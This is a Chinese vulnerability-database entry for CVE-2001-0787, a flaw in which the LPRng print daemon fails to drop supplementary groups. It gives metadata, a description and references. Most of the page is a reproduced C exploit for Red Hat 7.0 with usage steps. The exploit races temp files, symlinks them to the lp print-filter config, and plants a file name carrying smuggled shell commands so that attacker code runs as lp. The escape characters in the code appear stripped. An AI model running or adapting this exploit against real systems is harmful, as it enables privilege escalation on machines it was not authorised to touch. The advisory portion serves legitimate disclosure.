LPRng降低附加组权限失败漏洞

LPRng降低附加组权限失败漏洞

漏洞ID 1106373 漏洞类型 环境条件错误
发布时间 2001-06-07 更新时间 2005-05-02
图片[1]-LPRng降低附加组权限失败漏洞-安全小百科CVE编号 CVE-2001-0787
图片[2]-LPRng降低附加组权限失败漏洞-安全小百科CNNVD-ID CNNVD-200110-100
漏洞平台 Unix CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20923
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200110-100
|漏洞详情
CVE(CAN)ID:CVE-2001-0787当LPRng守护程序初始化时,没有降低附加组的权限。因此,该守护程序和所有该守护程序派生的子进程都会保留启动LPRng的进程所在的组。在此之前以较低权限运行的进程或程序将以这个附加组的权限运行,而易受攻击的程序一般都以较低的权限运行,由于没有降低附加组的权限,攻击者就很可能获得这些权限,甚至是root权限。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/2865/info

The LPRng software is an enhanced, extended, and portable implementation of the Berkeley LPR print spooler functionality.

When the LPRng daemon is initialized, it fails to drop its supplementary groups. As a result, the daemon and any child processes it spawns will maintain the supplementary groups inherited from the process that started LPRng.

Processes or routines which are meant to be run with lowered privileges will run with these supplementary group privileges. Vulnerable sections of program code are often run with lowered privileges because of susceptibility to attacks. Because they are not dropped, these privileges may be gained by an attacker if LPRng is vulnerable to such attacks.
*/

/********************************************************************
Redhat 7.0 (mebe 7.1 ?)

LPRng-3.7.4-23  (and earlier)  +  tetex-1.0.7-7   (and earlier?)

     Insecure tmp file privilege elevation vulnerability.

Allows uid/gid lp  and  root groups on LPRng-3.6.24 and earlier
Please note:

-rwxr-xr-x    1 lp       lp         444472 Jun 14 22:05 /usr/bin/lpq*
-rwxr-xr-x    1 lp       lp         441624 Jun 14 22:05 /usr/bin/lprm*
-rwxr-xr-x    1 lp       lp         459160 Jun 14 22:05 /usr/bin/lpr*
-rwxr-xr-x    1 lp       lp         448120 Jun 14 22:05 /usr/bin/lpstat*
-rwxr-xr-x    1 lp       lp         448320 Jun 14 22:05 /usr/sbin/lpc*

 this program allows trojan code to be planted on the machine it is
 executed on. 

 tmp file handling done badly in helper application (dvi print filter)
 allows modification to lp config files.
 the configuation file is sourced by the master print filter,
 which is itself a shell script, each time something is printed.
 this makes it possible to insert commands into the configuration file
 by creating a special filename to be included in the file that 
 is created. (see the close(open(" thingee )


Redhat Bugzilla reference:-

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342

 --zen-parse 

 requires some fonts get made when its run.
 probably won't be a problem unless someone
 else has tried this exploit.
 just wait 90 days for /var/lib/texmf to clear
 and try again ;]
 or try print something different
 .dvi files are what does the trick.

********************************************************************/

int shake()
{
 int f;
 char r[1000];
 int w;
 f=fopen("/proc/loadavg","r");
 fscanf(f,"%*s %*s %*s %*s %s",r);
 fclose(f);
 w=atoi(r);
 return w;
}
void cow(char *s,char *t,int ofs)
{
 sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs);
 sprintf(t,"%s/lsR%d.tmp",s,ofs);
}

main()
{
 char s[1000];
 char t[1000];
 int y,i;
 printf("Put the stuff to run as lp:lp in /tmp/haxn");
 printf("the lpr /usr/share/aspe<tab>/manual.dvin");
 printf("when the ! comes up, wait a second, then press control-C.nn");
 printf("Then print something.nnn");
 close(open("/var/lib/texmf/cd ..ncd ..ncd ..ncd ..ncd ..ncd ..ncd tmpnexport PATH=.nhaxnexit 0",65,0666));
 while(1)
 {
  i=shake();
  for(y=-30;y<0;y++)
  {
   cow(s,t,y+i);
   if(!access(t,0))
   { 
    printf("!n");
    unlink(t);
    symlink("/var/spool/lpd/lp/postscript.cfg",t);
    sleep(1);
   }
  }
 }
}
|参考资料

来源:REDHAT
名称:RHSA-2001:077
链接:http://www.redhat.com/support/errata/RHSA-2001-077.html
来源:XF
名称:lprng-supplementary-groups(6703)
链接:http://xforce.iss.net/static/6703.php
来源:BID
名称:2865
链接:http://www.securityfocus.com/bid/2865
来源:CIAC
名称:L-096
链接:http://www.ciac.org/ciac/bulletins/l-096.shtml

相关推荐: Michael Lamont Savant HTTP Server Directory Traversal Vulnerability

Michael Lamont Savant HTTP Server Directory Traversal Vulnerability 漏洞ID 1103418 漏洞类型 Input Validation Error 发布时间 2001-02-17 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享